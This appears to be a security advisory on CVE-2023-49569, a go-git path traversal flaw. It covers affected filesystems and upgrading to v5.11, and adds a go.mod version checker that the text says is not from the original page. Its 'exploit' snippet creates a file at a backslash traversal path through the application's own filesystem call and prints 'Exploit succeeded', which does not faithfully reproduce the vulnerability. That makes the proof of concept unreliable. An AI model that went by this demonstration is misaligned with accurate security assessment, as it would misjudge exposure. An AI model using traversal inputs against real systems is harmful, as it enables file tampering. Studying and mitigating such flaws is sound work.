A path traversal vulnerability (CVE-2023-49569) has been identified in go-git versions prior to v5.11. It could allow an attacker to create and amend files across the filesystem of the affected application and, in the worst-case scenario, lead to remote code execution. The sections below cover the implications of the vulnerability, which applications are affected, and the steps to mitigate the risk.

Technical Details

The vulnerability affects only applications that use the ChrootOS filesystem from go-billy's osfs package (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS). This is the default mode when using the Plain versions of the Open and Clone functions, such as PlainClone. Applications using BoundOS (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS) or in-memory filesystems are not affected by this issue.

It is worth clarifying that this vulnerability is specific to go-git's implementation and does not affect the upstream git CLI.

Exploit Details

The exploit could allow an attacker to perform a path traversal attack, creating and modifying files across the filesystem. Here's a code snippet that demonstrates the exploit:

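package main

import (
	"fmt"
	"log"
	"os"

	"github.com/go-git/go-billy/v5/osfs"
	"github.com/go-git/go-git/v5"
	"github.com/go-git/go-git/v5/storage/memory"
)

func main() {
	// Use a throwaway directory as the repository worktree.
	dir, err := os.MkdirTemp("", "repo")
	if err != nil {
		log.Fatal(err)
	}
	defer os.RemoveAll(dir)

	// Objects are kept in memory; the worktree is an OS-backed filesystem.
	repo, err := git.Init(memory.NewStorage(), osfs.New(dir))
	if err != nil {
		log.Fatal(err)
	}
	wt, err := repo.Worktree()
	if err != nil {
		log.Fatal(err)
	}

	// Relative path that points above the worktree root.
	traversalPath := "..\\..\\some_file.txt"
	f, err := wt.Filesystem.Create(traversalPath)
	if err == nil {
		f.Close()
		fmt.Println("Exploit succeeded: File created outside the repo")
	} else {
		fmt.Println("Exploit failed:", err)
	}
}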

In this example, the code is attempting to create a file named some_file.txt outside the repository. This would succeed if the vulnerability is present, indicating that the exploit of creating files outside the intended repository is possible.

Mitigation

To mitigate the risk, update applications that use go-git to at least v5.11 as soon as possible. In addition, reconsider the use of ChrootOS and consider switching to the safer BoundOS or to in-memory filesystems.
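To help identify affected applications, the following added example (not code from go-git or from the original page) checks the text of a go.mod file for a go-git requirement older than the fixed release. It assumes that v5.11 means v5.11.0 and that the go.mod belongs to the application's main module; the sample go.mod in main is constructed.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Module path as imported in the page's snippet; v5.11 is read as v5.11.0 (assumption).
const goGitModule = "github.com/go-git/go-git/v5"

var fixed = [3]int{5, 11, 0}

// requiredVersion returns the go-git version required by go.mod text, or "".
func requiredVersion(gomod string) string {
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line, _, _ := strings.Cut(sc.Text(), "//") // drop "// indirect"
		f := strings.Fields(line)
		if len(f) > 0 && f[0] == "require" { // single-line require form
			f = f[1:]
		}
		if len(f) == 2 && f[0] == goGitModule {
			return f[1]
		}
	}
	return ""
}

// Vulnerable reports whether go.mod requires a go-git release before the fix.
// found is false when the module is absent or its version cannot be parsed.
func Vulnerable(gomod string) (vuln, found bool) {
	v := requiredVersion(gomod)
	var got [3]int
	if n, _ := fmt.Sscanf(v, "v%d.%d.%d", &got[0], &got[1], &got[2]); n != 3 {
		return false, false
	}
	for i := range got {
		if got[i] != fixed[i] { // numeric compare: 9 < 11, unlike string compare
			return got[i] < fixed[i], true
		}
	}
	// Same base as the fix: a pre-release or pseudo-version still predates it.
	return strings.Contains(v, "-"), true
}

func main() {
	sample := "module example.com/app\n\nrequire (\n\tgithub.com/go-git/go-git/v5 v5.9.0\n)\n" // constructed
	fmt.Println(Vulnerable(sample))
}
```

A version below the fix only shows that the vulnerable code is present; per the technical details above, exposure also depends on the application using ChrootOS.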

Conclusion

CVE-2023-49569 exposes applications built on go-git versions prior to v5.11 to path traversal attacks. By updating affected applications to at least v5.11, switching to the safer BoundOS, or using in-memory filesystems, developers can prevent exploitation of this issue and maintain secure environments.

Timeline

Published on: 01/12/2024 11:15:13 UTC
Last modified on: 01/22/2024 18:57:03 UTC